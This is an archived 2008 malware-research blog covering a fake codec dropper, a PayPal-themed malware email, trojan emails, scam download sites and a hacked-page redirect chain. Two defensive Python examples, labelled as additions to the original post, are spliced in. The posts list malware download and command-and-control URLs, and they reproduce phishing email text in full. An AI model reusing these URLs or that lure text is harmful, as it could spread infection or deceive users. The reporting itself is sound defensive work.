http://theprivatetube.com/cd/693/0/wmcodec_update.exe

Which Avira kindly flagged for me .........



VT results for wmcodec_update.exe;

http://www.virustotal.com/analisis/fb970f590465d2da92b161aac1706893

Extraction of the executable failed whilst named .exe, so I tried renaming it to .zip (Universal Extractor identified it as a 7-zip file), and voila - I could extract it. The following is its contents;


*****************************************************
Ur I.T. Mate Group Intranet
http://mysteryfcm.co.uk

This file has been generated by QFScript v1.0 Revision 3
Author: Steven Burn - Ur I.T. Mate Group owner
Homepage: www.it-mate.co.uk

File index for: mylot_com\alldebt_biz_-_theprivatetube_com
*****************************************************
DATE/TIME - MD5 - FILE/FOLDER
25/09/2008 04:03:30     d96fa963dbabb94bb60fc38ded67cc7f     alldebt_biz_-_theprivatetube_com
25/09/2008 04:04:20     21a7031dde9bdb27f07f5fcfa58bd905     alldebt_biz_-_theprivatetube_com\wmcodec_update.exe
25/09/2008 04:14:06     89f3c6308bce5f634dfc374499b3a1a9     alldebt_biz_-_theprivatetube_com\wmcodec_update
25/09/2008 04:14:10     825f37247eaef9006448dc5d0265aa29     alldebt_biz_-_theprivatetube_com\wmcodec_update\$R0
25/09/2008 04:16:16     4119d31ea7da45cf0d9a6f9961918038     alldebt_biz_-_theprivatetube_com\wmcodec_update\script.bin
25/09/2008 04:16:20     8cfcf8ed20ed00fd6f80eabc6a8b321a     alldebt_biz_-_theprivatetube_com\wmcodec_update\ýŠ€
25/09/2008 04:16:20     307f3492345535f4d6d5ce2637c8341b     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir
25/09/2008 04:16:20     8cfcf8ed20ed00fd6f80eabc6a8b321a     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir\ýŠ€
25/09/2008 04:16:20     5680520d33b4175681abf3138a5ecfd6     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir\sx2_77000560.exe
25/09/2008 04:16:20     173ffeaf2e189bc76e476b255559b41a     alldebt_biz_-_theprivatetube_com\wmcodec_update\$PLUGINSDIR
25/09/2008 04:16:20     8183cd31665faaf5a7d7f5fa4d54e57b     alldebt_biz_-_theprivatetube_com\wmcodec_update\$PLUGINSDIR\System.dll
*****************************************************
3 folders, 7 files
*****************************************************


Sadly, detection for sx2_77000560.exe is rather pitiful, with only 2/36 actually detecting it;

http://www.virustotal.com/analisis/4df5fd8178baf3f313854d2839309eb5

The ýŠ€ and $R0 entries are all 0-byte files ........ Sadly, Universal Extractor, whilst again identifying sx2_77000560.exe as a 7-zip archive, could not actually extract it. (The $PLUGINSDIR folder, the $R0 file and System.dll are the tell-tale layout of an NSIS installer, which is what the 7-zip handler was really unpacking; the renaming trick only works because the tools key off the file's content, not its extension.)
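An added example, not part of the original post, covering the two points above: that an "installer" which will not unpack under its own name is identified by its leading bytes rather than its extension, and that with a PE file the interesting part is usually the overlay (the bytes appended after the last section), which is where NSIS and similar wrappers keep their payload. The PE skeleton built by build_fake_pe() is constructed for the demonstration and is not loadable; the signature table and the NSIS marker check are my own, not anything taken from the post's samples.

```python
import hashlib
import struct

# Leading-byte signatures. Constructed table for this example; add what your triage needs.
SIGNATURES = [
    (b"MZ", "pe"),                      # DOS/PE executable
    (b"7z\xbc\xaf\x27\x1c", "7z"),      # 7-Zip archive
    (b"PK\x03\x04", "zip"),             # ZIP archive
    (b"Rar!\x1a\x07", "rar"),           # RAR archive
]
NSIS_MARKER = b"NullsoftInst"           # NSIS "first header" magic, found at the start of the overlay


def sniff(data: bytes) -> str:
    """Classify a blob by its first bytes; the file name/extension is not consulted at all."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    return "unknown"


def pe_overlay_offset(data: bytes):
    """Offset of the first byte after the last PE section: installers and droppers append
    their real payload there. Returns None when the headers do not parse as a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    nsect = struct.unpack_from("<H", data, e_lfanew + 6)[0]        # COFF NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]    # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                                # section table follows it
    end = table + 40 * nsect
    for i in range(nsect):
        # each 40-byte section header: SizeOfRawData at +16, PointerToRawData at +20
        size_raw, ptr_raw = struct.unpack_from("<II", data, table + 40 * i + 16)
        end = max(end, ptr_raw + size_raw)
    return end


def triage(data: bytes) -> dict:
    """Hash the blob, identify the container, and if it is a PE look at what is appended to it."""
    info = {"md5": hashlib.md5(data).hexdigest(), "kind": sniff(data),
            "overlay_offset": None, "overlay_kind": None, "nsis": False}
    if info["kind"] == "pe":
        off = pe_overlay_offset(data)
        if off is not None and off < len(data):
            overlay = data[off:]
            info["overlay_offset"] = off
            info["overlay_kind"] = sniff(overlay)
            info["nsis"] = NSIS_MARKER in overlay[:32]   # flags, 0xDEADBEEF, then "NullsoftInst"
    return info


def build_fake_pe(overlay: bytes) -> bytes:
    """Constructed sample: a minimal, non-runnable PE skeleton (one 16-byte section) with
    `overlay` appended, so the parser above has something realistic to walk."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                                   # e_lfanew
    coff = struct.pack("<IHHIIIHH", 0x00004550, 0x14C, 1, 0, 0, 0, 0, 0x102)  # "PE\0\0", i386, 1 section, no optional header
    raw_ptr = 0x40 + len(coff) + 40
    section = b".text\0\0\0" + struct.pack("<IIII", 0x10, 0x1000, 0x10, raw_ptr) + b"\0" * 16
    return bytes(dos) + coff + section + b"\x90" * 0x10 + overlay


if __name__ == "__main__":
    samples = {
        "nsis-like dropper": build_fake_pe(b"\0\0\0\0\xef\xbe\xad\xde" + NSIS_MARKER + b"\0" * 24),
        "pe with 7z overlay": build_fake_pe(b"7z\xbc\xaf\x27\x1c" + b"\0" * 8),
        "bare 7z archive": b"7z\xbc\xaf\x27\x1c" + b"\0" * 8,
    }
    for label, blob in samples.items():
        print(label, triage(blob))
```

Run against the real wmcodec_update.exe, triage() would report kind "pe" with an NSIS overlay; the MD5 it prints is the same value the QFScript listing records, so the two can be cross-checked before anything is renamed or submitted.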

Looking through the wmcodec_update.exe executable shows some interesting content too. For example, it contains the following URL references;

http://meta38.com/service/index.php
http://linker15.cn/service/index.php



Both URLs return the same content;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://meta38.com/service/index.php
Server IP: 200.63.45.51 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 04:29:43:29
*****************************************************************
<root>
<serviceurls>
<serviceurl>http://meta38.com/service/index.php</serviceurl>
<serviceurl>http://linker15.cn/service/index.php</serviceurl>
</serviceurls>
<feedurls>
<feedurl>http://bestsearch3.com/feed/get.php</feedurl>
<feedurl>http://bestsearch4.com/feed/get.php</feedurl>
</feedurls>
</root>


bestsearch3.com and bestsearch4.com both returned an empty result set, so nothing useful there.

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://bestsearch3.com/feed/get.php
Server IP: 200.63.45.51 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 04:33:04:33
*****************************************************************
<?xml version="1.0" encoding="UTF-8" ?>
<result>
</result>

Your Pay Pal Account May Be Compromised

I'm used to getting PayPal phishing scams; that's certainly nothing new. However, I've not had one of these in a while - a PayPal infection scam. Unlike your run-of-the-mill phish, this doesn't include any links to third-party servers (other than PayPal themselves), but instead includes an attachment (you know what's coming).

The e-mail itself is pretty straight forward, simply stating;

Dear member,
As part of our security measures, we regularly screen activity in the PayPal system.

We have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection. Please review the report that we have attached to this email to see who accessed your account and contact us promptly if anything is unusual.

Case ID Number: PP-854-512-134

Thank you for your patience as we work together to protect your account.

PayPal Account Review Department
PayPal Email ID PP2310


The attachment is a 324K zip with the name account-1407A4-report.zip (MD5: 713885a1432fc4a822f9473828045952), I've no doubt that the alphanumeric part will be randomized - they usually are. Avira flagged this one as TR/Crypt.XDR.Gen, and running it through VT showed pretty bad results;

http://www.virustotal.com/analisis/a339e57900d936a58d8fa970d7de6977

... a measly 19/32 have detections for it.

Exported by: Outlook Export v0.1.2


From: security@paypal(dot)com
E-mail:security@paypal(dot)com [ 66.211.168.193 - node-66-211-168-193.networks.paypal(dot)com ]
Date: 24/09/2008 14:23:39
Subject: Your Pay Pal Account May Be Compromised
**************************************************************************
Links
**************************************************************************

Link: https://www.paypal(dot)com/us
Domain: www.paypal(dot)com
IP: 66.211.168.193 [ node-66-211-168-193.networks.paypal(dot)com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false

Link: hxxp://images.paypal(dot)com/en_US/i/scr/pixel.gif
Domain: images.paypal(dot)com
IP: 66.211.168.128 [ images.paypal(dot)com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: false


**************************************************************************
Text Version
**************************************************************************
PayPal <https://www.paypal(dot)com/us>
src=http://images.paypal(dot)com/en_US/i/scr/pixel.gif
src=http://images.paypal(dot)com/en_US/i/scr/pixel.gif
Dear member,
As part of our security measures, we regularly screen activity in the PayPal system.

We have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection. Please review the report that we have attached to this email to see who accessed your account and contact us promptly if anything is unusual.

Case ID Number: PP-854-512-134






Thank you for your patience as we work together to protect your account.

PayPal Account Review Department
PayPal Email ID PP2310


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>PayPal <<A HREF="https://www.paypal(dot)com/us">https://www.paypal(dot)com/us</A>>     <BR>
src=<A HREF="http://images.paypal(dot)com/en_US/i/scr/pixel.gif">http://images.paypal(dot)com/en_US/i/scr/pixel.gif</A>     <BR>
src=<A HREF="http://images.paypal(dot)com/en_US/i/scr/pixel.gif">http://images.paypal(dot)com/en_US/i/scr/pixel.gif</A>     <BR>
Dear member,   <BR>
As part of our security measures, we regularly screen activity in the PayPal system.<BR>
<BR>
We have reason to believe that your account was accessed by a third party. Because protecting the security of your account is our primary concern, we have limited access to sensitive PayPal account features. We understand that this may be an inconvenience but please understand that this temporary limitation is for your protection. Please review the report that we have attached to this email to see who accessed your account and contact us promptly if anything is unusual.<BR>
<BR>
Case ID Number: PP-854-512-134<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
Thank you for your patience as we work together to protect your account.<BR>
<BR>
PayPal Account Review Department       <BR>
PayPal Email ID PP2310 <BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <security@paypal(dot)com>
Delivered-To: services@[ITM]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-72.livemail.co.uk (Postfix) with SMTP id 4BB7166E6C5
for <services@[ITM]>; Wed, 24 Sep 2008 14:19:06 +0100 (BST)
Received: from paypal(dot)com (rrcs-24-123-221-42.central.biz.rr.com [24.123.221.42])
by smtp-in-72.livemail.co.uk (Postfix) with ESMTP id C661766E71A
for <hphosts@[ITM]>; Wed, 24 Sep 2008 14:18:49 +0100 (BST)
From: security@paypal(dot)com
To: hphosts@[ITM]
Subject: Your Pay Pal Account May Be Compromised
Date: Wed, 24 Sep 2008 09:23:39 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0011_AA8C3ED1.95BE0846"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20080924131849.C661766E71A@smtp-in-72.livemail.co.uk>
X-Original-To: hphosts@[ITM]

Next hpHosts update

Just a note folks, the next update - as long as nothing else goes wrong (had the mail server go down today, and my laptop is now playing silly buggers) - will hopefully be out by Saturday.

Monday 22 September 2008

Exclusive photos, you'll be happy!

HA! happy if you like your computer infected with trojans (TR/Dldr.Small.ADMM to be exact) perhaps .....

http://www.virustotal.com/analisis/baccc58a407108294e1d9e245ca75273

This trojan creates a file called rs32net.exe in the %system% folder (generally C:\Windows\System for 9x, System32 for 2000 and above), and connects to the following on port 80;

216.195.56.22
208.66.195.71
208.66.195.15

... it also, rather kindly, creates an entry in the registry so it runs each time a user logs on;

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rs32net

The e-mail seems to want to both insult us younger folk (heh!) and keep things as short as possible, simply stating;

Hello, old chap.

Watch my tits!

Thanks.


Ah the joys .....

Exported by: Outlook Export v0.1.2


From: Rodney Estrada
E-mail:seamus.danby@acg-wien.at [ 80.243.163.49 - www29.world4you.com ]
Date: 23/09/2008 03:24:48
Subject: Exclusive photos, you'll be happy
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
Hello, old chap.

Watch my tits!

Thanks.


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>Hello, old chap.<BR>
<BR>
Watch my tits!<BR>
<BR>
Thanks.<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <seamus.danby@acg-wien.at>
Delivered-To: services@[RMVD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-165.livemail.co.uk (Postfix) with SMTP id 97ACFEB0098
for <services@[RMVD]>; Tue, 23 Sep 2008 03:24:55 +0100 (BST)
Received: from ip-154-105-net.express.net.id (ip-154-105-net.express.net.id [203.153.105.154])
by smtp-in-165.livemail.co.uk (Postfix) with ESMTP id 0272DEB0098
for <jane@[RMVD]>; Tue, 23 Sep 2008 03:24:52 +0100 (BST)
Received: from [203.153.105.154] by mail.acg-wien.at; Tue, 23 Sep 2008 10:24:48 +0800
Message-ID: <01c91d66$9aef1800$9a6999cb@seamus.danby>
From: "Rodney Estrada" <seamus.danby@acg-wien.at>
To: <jane@[RMVD]>
Subject: Exclusive photos, you'll be happy
Date: Tue, 23 Sep 2008 10:24:48 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0006_01C91D66.9AEF1800"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.71.2244.8
X-MimeOLE: Produced By Microsoft MimeOLE V4.71.2244.8
X-Original-To: jane@[RMVD]


Sunday 21 September 2008

fSpamList.com Users - There's a new support forum for you!

I've been speaking to Josh, who runs fSpamList.com, and we've set up a new support forum for those users that use his database and may require help with it, along of course with those who are listed (IP, username or e-mail) and would like to request removal.

The support forums are located at the hpHosts Support Forums, and require free registration before being allowed to post (for obvious reasons).

fSpamList Support
http://forum.hosts-file.net/viewforum.php?f=63

In addition to this, with the help of SysAdMini (MalwareDomainList), I've also modified a PHP script written by Smurf_Minions so that it can check e-mail addresses, IPs and usernames against the fSpamList database as well as the SFS (StopForumSpam) database;

[CODE] Querying the fSpamList and StopForumSpam databases
http://forum.hosts-file.net/viewtopic.php?f=64&t=737

Saturday 20 September 2008

242 reasons to avoid 78.129.142.9 (RapidSwitch - AS29131)

I've got a little history with these chaps and chapesses, and it ain't good! It all started in February of this year, when I came across two scammy websites;

i-explorer.info
operasoft.info

The latter, thanks to the help of Stein Vråle and the legal/abuse folks at Opera, was shut down. The former however, is still online to date. At the time, it was peddling what they claimed was Internet Explorer 7, but like goofull.com, wanted you to send them an SMS text that, surprise surprise, ended up with you paying through the nose. I did report them to RapidSwitch, for all the good it did - evidently RapidSwitch couldn't give a hoot as long as they're getting paid.

https://myservers.rapidswitch.com/Abuse/AbuseTicket.aspx?ticketid=VDNL-GOE-KQJF&key=rrgvsfteml

i-explorer.info is now peddling what they claim is Internet Explorer Pro 2.3.6 Final, and surprise surprise, you gotta pay them. As evidenced by the following in the installer's nsi.ini file;

You are using a Premium Download.\r\n\r\nTo continue you must get an activation code.



If you click to get an activation code, you are taken to (screenshot);

http://www.i-explorer.info/uk/check_code.php

Which has the lovely little disclaimer at the bottom;


You made a premium download. The server used to download this software needs that you send 3 ( total cost 6 pounds ) sms before installing on your computer. Please read Terms of Service for more info This charge is used to support the virus & spyware check team. Activating Download doesn't mean acquire a software license.


.... and nope, "Terms of Service" is not linkified - thar be nothing to click. The TOS is actually located at;

http://www.i-explorer.info/uk/condiciones.html

... and makes for interesting reading.

Surprisingly, if you go to i-explorer.info (the main homepage), you get redirected to /es and you get what actually seems to be the IE 8 beta (this is also not a good thing as I'm pretty sure Microsoft don't allow redistribution of their betas), packaged in a 7-zip file. I'll have to do a comparison with the official IE 8 beta from Microsoft to see if they've added/modified anything.

Alas however, this is just one of the sites on this IP, there are many others - and the theme remains the same. i-explorer.net for instance, peddles what they claim is Internet Explorer 8.0.6001.18241 Beta 2 (XP), and leads you to download;

http://www.i-explorer.net/uk/install_IE8WindowsXPx86ENU.exe.exe

Unlike i-explorer.info/es, this definitely isn't the official Microsoft beta, as evidenced by the same thing as previously referenced appearing in the installer's nsi.ini file (the screenshot above is the same theme that appears here).

Once again, you are led to the following in order to pay them;

http://www.i-explorer.net/uk/check_code.php

... which has the same disclaimer as i-explorer.info.

To view the full list of domains running this scam (or at least, those I've got in the hpHosts database), see;

http://hosts-file.net/pest.asp?show=78.129.142.

So what of RapidSwitch? Well, I tried calling, I tried e-mailing, and eventually the RS MD called me to tell me they'd now banned my e-mail address from contacting them - which I found hilarious. His reason? I had apparently registered on their system as a customer.

Er nope .... I sent an e-mail to support@rapidswitch.com and sales@rapidswitch.com, as sending it to abuse@ created duplicate tickets.

After the call, I sent them the following;

Dear Sir/Madam,
First and foremost, I would like to complain about the way in which you handle people that telephone yourselves.

Telling me you cannot deal with me over the phone is bad enough, but to also tell me you cannot give me a contact e-mail address (that will NOT result in yet another new ticket being created) over the phone is just taking the mick (which incidentally, is why I'm sending this to both of the e-mail addresses on your contact page). I've already sent an e-mail to your abuse department concerning this, and it created a duplicate ticket, which is why I was calling.

Secondly, I would like to complain about the way your company deals with complaints. I reported one of your customers running sites which are clearly illegal, and if you have such, should be against your terms of service.

Since I have not had a response on the ticket since the 11th, I decided to call this morning - to be told you would not deal with me over the phone. I've provided you with evidence of the illegal activity, and am disgusted that you have allowed the sites to stay online, and have further allowed your client not to respond.

Original:
https://myservers.rapidswitch.com/Abuse/AbuseTicket.aspx?ticketid=VDNL-GOE-KQJF&key=rrgvsfteml

Duplicate:
https://myservers.rapidswitch.com/Abuse/AbuseTicket.aspx?ticketid=QFYX-DQU-SXNT&key=dzphkivozj

If contacting the appropriate authorities is the only way to get you to deal with this, then I will be more than happy to do so. Additionally, if you allow this type of activity to occur on your network, I will also do my best to ensure this practice is publicized.


... and their reply?

Steven,

We have a strict procedure for abuse complaints; please email abuse@rapidswitch.com

Thank you,

Regards,

Paul Tacey-Green
RapidSwitch Ltd
Tel: 020 7106 0730

RapidSwitch Ltd, Technical Building, Priors Way, Maidenhead, SL6 2HP


Woops! Seems Paul wasn't informed that;

1. My domain had been blocked (which itself begs the question of how my e-mail got through).
2. Sending an e-mail to abuse@ creates a ticket that, alas, may as well just be completely ignored - RapidSwitch themselves certainly aren't going to do anything.

Nevertheless, the fact these are still online, and there's been more popping up since I reported the sites to them, simply proves that RapidSwitch couldn't give a hoot - they're getting paid. Thus my personal recommendation? Drop their entire range;


inetnum: 78.129.142.0 - 78.129.142.255
netname: Rapidswitch_9
descr: Rapidswitch Ltd
country: GB
admin-c: AR6363-RIPE
tech-c: AR6363-RIPE
status: ASSIGNED PA
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

person: Abuse Robot
address: RapidSwitch Ltd
address: Technical Building
address: Priors Way
address: Maidenhead
address: SL6 2HP
phone: +44 (0)20 7106 0730
remarks: ******************************************************
remarks: * ABUSE REPORTS *
remarks: * E-mail: abuse@rapidswitch.com *
remarks: * https://myservers.rapidswitch.com/reportabuse.aspx *
remarks: * IMPORTANT: We are unable to accept abuse reports *
remarks: * any other way except the two methods listed above. *
remarks: ******************************************************
e-mail: abuse@rapidswitch.com
nic-hdl: AR6363-RIPE
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered

% Information related to '78.129.128.0/17AS29131'

route: 78.129.128.0/17
descr: RapidSwitch Ltd
origin: AS29131
mnt-by: RAPIDSWITCH-MNT
source: RIPE # Filtered
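An added example, not part of the original post, for the "drop their entire range" recommendation. The RIPE output above gives two different scopes: the inetnum (78.129.142.0 - 78.129.142.255, the customer assignment the scam sites live in) and the route (78.129.128.0/17, everything RapidSwitch announces under AS29131). inetnum is a start-end pair, not a prefix, so it has to be summarised into CIDR before it can go into a firewall. The whois text below is constructed from the objects quoted in the post with the other attributes dropped; the rule format is plain iptables-restore syntax and the "assigned"/"route"/"outside" labels are my own.

```python
import ipaddress
import re

# Constructed from the RIPE objects quoted in the post (whitespace normalised, other attributes dropped).
RIPE_SAMPLE = """\
inetnum: 78.129.142.0 - 78.129.142.255
netname: Rapidswitch_9
descr: Rapidswitch Ltd
country: GB
route: 78.129.128.0/17
descr: RapidSwitch Ltd
origin: AS29131
"""


def parse_whois(text):
    """Pull the assignment (inetnum) and the announced route out of RIPE-style output.
    inetnum is a start-end pair, not a prefix, so it is summarised into CIDR blocks."""
    blocks = {"inetnum": [], "route": []}
    for start, end in re.findall(r"^inetnum:\s*(\S+)\s*-\s*(\S+)", text, re.M):
        blocks["inetnum"].extend(
            ipaddress.summarize_address_range(ipaddress.ip_address(start), ipaddress.ip_address(end)))
    for prefix in re.findall(r"^route:\s*(\S+)", text, re.M):
        blocks["route"].append(ipaddress.ip_network(prefix, strict=False))
    return blocks


def classify(ip, blocks):
    """'assigned' = inside the customer assignment the abuse came from,
    'route' = elsewhere in the provider's announced prefix, 'outside' = unrelated."""
    addr = ipaddress.ip_address(ip)
    if any(addr in n for n in blocks["inetnum"]):
        return "assigned"
    if any(addr in n for n in blocks["route"]):
        return "route"
    return "outside"


def iptables_rules(blocks, scope="inetnum"):
    """Rule lines for `iptables-restore`; scope='route' widens the drop to the whole /17."""
    return [f"-A INPUT -s {net.with_prefixlen} -j DROP" for net in blocks[scope]]


if __name__ == "__main__":
    blocks = parse_whois(RIPE_SAMPLE)
    print({k: [str(n) for n in v] for k, v in blocks.items()})
    for ip in ("78.129.142.9", "78.129.200.1", "8.8.8.8"):
        print(ip, classify(ip, blocks))
    print("\n".join(iptables_rules(blocks)))
```

Dropping the /24 covers every host in the listing linked above; dropping the /17 also covers the rest of RapidSwitch's customers, which is the trade-off the post's recommendation leaves to the reader.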

Friday 19 September 2008

cr4nk.ws has gone!

It would seem the folks at DirectI/Logicboxes have taken the initiative and actually taken notice of the report I sent them, as the WhoIs for cr4nk.ws is now showing as suspended.

Domain Name: CR4NK.WS

Registrar Name: Directi Internet Solutions Pvt. Ltd. DBA PublicDomainRegistry.com
Registrar Email: tldadmin@logicboxes.com
Registrar Telephone: 832-295-1535
Registrar Whois: whois.publicdomainregistry.com

Registrant Name: See registrar info above
Registrant Email: See registrar info above

Administrative Contact Email: See registrar info above
Administrative Contact Telephone: See registrar info above

Domain Created: 2008-02-16
Domain Last Updated: 2008-09-19
Domain Currently Expires: 2009-02-16

Current Nameservers:

ns1.suspended-domain.com
ns2.suspended-domain.com


WhoIs server: whois.website.ws


References:

cr4nk.ws has moved to Hostfresh
http://hphosts.blogspot.com/2008/09/cr4nkws-has-moved-to-hostfresh.html

cr4nk.ws has moved to Hostfresh

Alas, they're still with DirectI, however, and still actively trying to exploit my servers (amongst other people's, of course), so I've fired off another abuse report (perhaps DirectI will actually shut them down this time?).

The new IP for cr4nk.ws is 116.50.15.114 (Hostfresh - AS23898), with the old IP address being 67.225.157.104, the latter of which of course, is Liquid Web (AS32244).

inetnum: 116.50.8.0 - 116.50.15.255
netname: HOSTFRESH
descr: HostFresh
descr: Internet Service Provider
country: HK
admin-c: PL466-AP
tech-c: PL466-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-HK-HOSTFRESH
mnt-routes: MAINT-HK-HOSTFRESH
remarks: Please send Spam & Abuse report to
remarks: abuse@hostfresh.com
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20070307
source: APNIC

person: Piu Lo
nic-hdl: PL466-AP
e-mail: ipadmin@hostfresh.com
address: No. 500, Post Office, Tuen Mun, N.T., Hong Kong
phone: +852-35979788
fax-no: +852-24522539
country: HK
changed: ipadmin@hostfresh.com 20071025
mnt-by: MAINT-HK-HOSTFRESH
source: APNIC


References:

cr4nk.ws again - another Directi, LogicBoxes, LiquidWeb exploit gang
http://hphosts.blogspot.com/2008/09/cr4nkws-again-another-directi.html

hpHosts Online - cr4nk.ws
http://hosts-file.net/?s=cr4nk.ws

Report Slams U.S. Host as Major Source of Badware - Security Fix
http://voices.washingtonpost.com/securityfix/2008/08/report_slams_us_host_as_major.html

Spamhaus Blog - Cybercrime's U.S. Home
http://www.spamhaus.org/news.lasso?article=636

Thursday 18 September 2008

AARP Site "Hack", more than just porn promotion

There's slightly more to it than just spam promoting porn pages via Google. Looking through the code shows multiple redirections (a 301 and then a 302) which eventually lead to a Cernel-hosted site that will infect the unsuspecting user with the Zlob trojan;

Start here;
http://vurl.mysteryfcm.co.uk/?url=http://www.aarp.org/community/c1w2y8&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=4&ref=

/Begin edit 22-09-08 00:58

A check a few seconds ago, shows the aarp profile no longer exists. Alas there doesn't seem to be a cache of it either ....

/-End edit 22-09-08 00:58

Next, it leads you to;

http://vurl.mysteryfcm.co.uk/?url=http://plzwait.info/in.cgi?2&parameter=teen+galleries&ur=1&HTTP_REFERER=http://www.aarp.org/community/c1w2y8&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=3&ref=http://www.aarp.org/community/c1w2y8

If you look at the headers (displayed just above the source code), you'll notice the 301 via joyfulclipz.com followed by the 302 via breeddirect.com.

The final result is the Zlob trojan (setup.exe: 12K UPX-packed, 32K unpacked, a Visual C++ 6 binary), courtesy of movsdevices.com, as shown in the source at the following.



http://vurl.mysteryfcm.co.uk/?url=http://plzwait.info/st/st.php?cat=63&script=1&url=http://www.wootmovs.com/m4/index.php?id=1117&n=teen&a=fireplace&v=2133734&preview=http://img2.joyfulclipz.com/st/thumbs/010/7598829497.jpg&p=100&selUAStr=1&cbxLinks=&cbxSource=on&cbxBlacklist=on&selServer=3&ref=http://plzwait.info/in.cgi?2&parameter=teen%20galleries&ur=1&HTTP_REFERER=http://www.aarp.org/community/c1w2y8

Detection for the file, packed and unpacked, is rubbish :o(

Packed (5/36)
http://www.virustotal.com/analisis/a65ca4aea5af13882b9e3c340a419922

Unpacked (1/36)
http://www.virustotal.com/analisis/9f242182ca38a09c4e050043e22b5b76

Alas I'm in the process of fixing my laptop at the moment, so I'll leave the detailed analysis of the executable to someone else.

Sites involved:

breeddirect.com (78.157.143.200)
joyfulclipz.com (78.108.177.124)
img2.joyfulclipz.com (78.108.177.124, also valid as img1-4.)
wootmovs.com (78.157.143.133)
movsdevices.com (77.91.231.201)

References:

AARP Site Hacked and Spammed
http://www.mxlogic.com/itsecurityblog/1/2008/09/AARP-Site-Hacked-and-Spammed.cfm

Porn Operators Hijack Pages on AARP Website
http://www.darkreading.com/document.asp?doc_id=164115&f_src=darkreading_section_296

Knew I'd find the original reference that led me to this ;o)

Porn Operators Hijack Pages on AARP Website
http://temerc.com/forums/viewtopic.php?f=4&t=5780

Penguin Panic!

Thar be a new infected e-mail floating round folks. This one comes with a variety of subjects, and so far, a single zip - penguin.panic.zip, which of course, contains an executable (14K) of the same name.

http://www.virustotal.com/analisis/120fb641310e4704565ef683ca33b2d0

The executable does contain a little string that seems to lay claim to its origins being those of "Botnet Jack";



Subjects I've seen thus far;

Take a break!
Apple: The most popular game!
iPhone's most popular game!
Apple presents iPhone games!
Play iPhone on your PC today.

Content of the e-mails that I've seen thus far include;

Beet my score! (7000 points)!
Steve Jobs presents iPhone!
Take a break!
Famous iPhone games!
iPhone's most popular game!

Needless to say folks, if you receive this, delete it!

References:

hi, botnet Jack here
http://blogs.law.harvard.edu/zeroday/2008/09/18/hi-botnet-jack-here/

Sporadic e-mail issues

Alas I must've annoyed someone at FastHosts hehe*

Over the past few days, I've noticed a sporadic issue with my being able to connect to my incoming mail server, meaning I can only occasionally, receive it. I've already spoken to my host, and they're going to get in touch with FastHosts about it. In the meantime however, if I don't respond to your e-mail straight away, please be patient - it's not my fault!

* Poor attempt at a joke

Tuesday 16 September 2008

EstDomains now allowing WhoIs queries

